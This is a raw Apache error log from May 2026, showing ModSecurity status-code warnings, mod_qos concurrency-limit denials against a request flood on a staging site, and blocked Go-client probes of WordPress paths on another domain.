[Tue May 26 20:00:35.399653 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswGIAAAAGo"]
[Tue May 26 20:00:35.401810 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGTgAAAHE"]
[Tue May 26 20:00:35.406871 2026] [security2:error] [pid 93576:tid 93756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGZgAAACw"]
[Tue May 26 20:00:35.406944 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1iyAAAAJ0"]
[Tue May 26 20:00:35.409906 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGUQAAADc"]
[Tue May 26 20:00:35.416333 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGagAAABo"]
[Tue May 26 20:00:35.423241 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGZAAAAAM"]
[Tue May 26 20:00:35.427501 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1iyQAAANQ"]
[Tue May 26 20:00:35.434823 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGaAAAAFo"]
[Tue May 26 20:00:35.434887 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGbwAAACM"]
[Tue May 26 20:00:35.438539 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGawAAAE4"]
[Tue May 26 20:00:35.570843 2026] [security2:error] [pid 93576:tid 93724] [client 103.163.220.37:36407] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/about.php"] [unique_id "ahWui2DRMqfxdEDkoswGswAAAAw"]
[Tue May 26 20:00:35.790464 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jLAAAAKQ
[Tue May 26 20:00:35.790698 2026] [qos:error] [pid 106517:tid 106744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui4ZZc2DoU1lPnP1jLQAAAOI
[Tue May 26 20:00:35.792357 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui4ZZc2DoU1lPnP1jLwAAAOE
[Tue May 26 20:00:35.792375 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWui4ZZc2DoU1lPnP1jMAAAAJE
[Tue May 26 20:00:35.792614 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui4ZZc2DoU1lPnP1jMgAAAIo
[Tue May 26 20:00:35.796286 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui4ZZc2DoU1lPnP1jNwAAAOo
[Tue May 26 20:00:35.800713 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui2DRMqfxdEDkoswHDwAAAFg
[Tue May 26 20:00:35.800945 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui2DRMqfxdEDkoswHDgAAAAA
[Tue May 26 20:00:35.801261 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui4ZZc2DoU1lPnP1jPAAAAJQ
[Tue May 26 20:00:35.806772 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui2DRMqfxdEDkoswHEgAAAHE
[Tue May 26 20:00:35.807330 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui2DRMqfxdEDkoswHEwAAABM
[Tue May 26 20:00:35.946426 2026] [qos:error] [pid 106517:tid 106701] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jQgAAALc
[Tue May 26 20:00:35.948184 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jQwAAAM0
[Tue May 26 20:00:35.948781 2026] [qos:error] [pid 106517:tid 106751] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jRAAAAOk
[Tue May 26 20:00:35.949850 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswHGgAAAAA
[Tue May 26 20:00:35.951210 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jRQAAAJY
[Tue May 26 20:00:35.952539 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswHHAAAAFg
[Tue May 26 20:00:35.955616 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui2DRMqfxdEDkoswHHQAAAHw
[Tue May 26 20:00:35.957218 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswHHwAAAAw
[Tue May 26 20:00:35.957563 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:53530] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswHIAAAAHE
[Tue May 26 20:00:35.959433 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWui2DRMqfxdEDkoswHHgAAABg
[Tue May 26 20:00:36.017517 2026] [security2:error] [pid 106517:tid 106773] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWui4ZZc2DoU1lPnP1jGQAAAP8"]
[Tue May 26 20:00:36.063296 2026] [security2:error] [pid 93576:tid 93825] [client 103.163.220.33:28555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/block-bindings/"] [unique_id "ahWujGDRMqfxdEDkoswHJAAAAHE"]
[Tue May 26 20:00:36.098930 2026] [qos:error] [pid 106517:tid 106759] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jSgAAAPE
[Tue May 26 20:00:36.099503 2026] [qos:error] [pid 106517:tid 106763] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jSQAAAPU
[Tue May 26 20:00:36.099863 2026] [qos:error] [pid 106517:tid 106670] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jSwAAAJk
[Tue May 26 20:00:36.101543 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jTAAAAKs
[Tue May 26 20:00:36.102518 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHKwAAAHM
[Tue May 26 20:00:36.104392 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHLAAAAGo
[Tue May 26 20:00:36.107161 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:53530] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHLQAAAHE
[Tue May 26 20:00:36.107867 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jTQAAAJs
[Tue May 26 20:00:36.109699 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHLgAAADE
[Tue May 26 20:00:36.112305 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHLwAAAAI
[Tue May 26 20:00:36.246973 2026] [qos:error] [pid 106517:tid 106768] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jUQAAAPo
[Tue May 26 20:00:36.249987 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jUgAAAPM
[Tue May 26 20:00:36.252997 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jUwAAANc
[Tue May 26 20:00:36.253764 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jVAAAAN4
[Tue May 26 20:00:36.256985 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHMwAAAB0
[Tue May 26 20:00:36.259061 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHNAAAABc
[Tue May 26 20:00:36.259295 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:53530] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHNQAAABw
[Tue May 26 20:00:36.259565 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWujIZZc2DoU1lPnP1jVQAAAKQ
[Tue May 26 20:00:36.259586 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWujGDRMqfxdEDkoswHNgAAAGg
[Tue May 26 20:00:36.278782 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGbQAAACU"]
[Tue May 26 20:00:36.279384 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1iywAAAOg"]
[Tue May 26 20:00:36.283073 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGaQAAAGE"]
[Tue May 26 20:00:36.293961 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGfQAAAGc"]
[Tue May 26 20:00:36.305179 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGbgAAAH8"]
[Tue May 26 20:00:36.306273 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i4QAAAJo"]
[Tue May 26 20:00:36.315222 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i4gAAAKc"]
[Tue May 26 20:00:36.323727 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i3wAAAP4"]
[Tue May 26 20:00:36.340964 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i4AAAAKM"]
[Tue May 26 20:00:36.341829 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i5AAAAJA"]
[Tue May 26 20:00:36.346465 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui4ZZc2DoU1lPnP1jCwAAAQE"]
[Tue May 26 20:00:36.349883 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i8gAAANM"]
[Tue May 26 20:00:36.350323 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i6wAAAOM"]
[Tue May 26 20:00:36.360013 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGwAAAAGU"]
[Tue May 26 20:00:36.361803 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i7wAAALM"]
[Tue May 26 20:00:36.365517 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i4wAAALE"]
[Tue May 26 20:00:36.367111 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuioZZc2DoU1lPnP1i6QAAAMQ"]
[Tue May 26 20:00:36.381841 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG0AAAAAU"]
[Tue May 26 20:00:36.387853 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGxQAAAEk"]
[Tue May 26 20:00:36.392269 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGrAAAADA"]
[Tue May 26 20:00:36.398223 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGhgAAAG8"]
[Tue May 26 20:00:36.403550 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGyAAAADo"]
[Tue May 26 20:00:36.404818 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGxAAAAFA"]
[Tue May 26 20:00:36.413074 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGxwAAAAg"]
[Tue May 26 20:00:36.418868 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG6AAAACE"]
[Tue May 26 20:00:36.420391 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG5gAAAHI"]
[Tue May 26 20:00:36.424186 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG0wAAAEA"]
[Tue May 26 20:00:36.424888 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswGwQAAACs"]
[Tue May 26 20:00:36.436498 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG6QAAAHc"]
[Tue May 26 20:00:36.444406 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG5wAAAE8"]
[Tue May 26 20:00:36.448564 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWui2DRMqfxdEDkoswG3wAAAAk"]
[Tue May 26 20:00:36.566224 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWujGDRMqfxdEDkoswHegAAAAQ
[Tue May 26 20:00:36.574953 2026] [security2:error] [pid 106517:tid 106777] [client 103.163.220.25:37253] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/languages/themes/"] [unique_id "ahWujIZZc2DoU1lPnP1jhQAAAQM"]
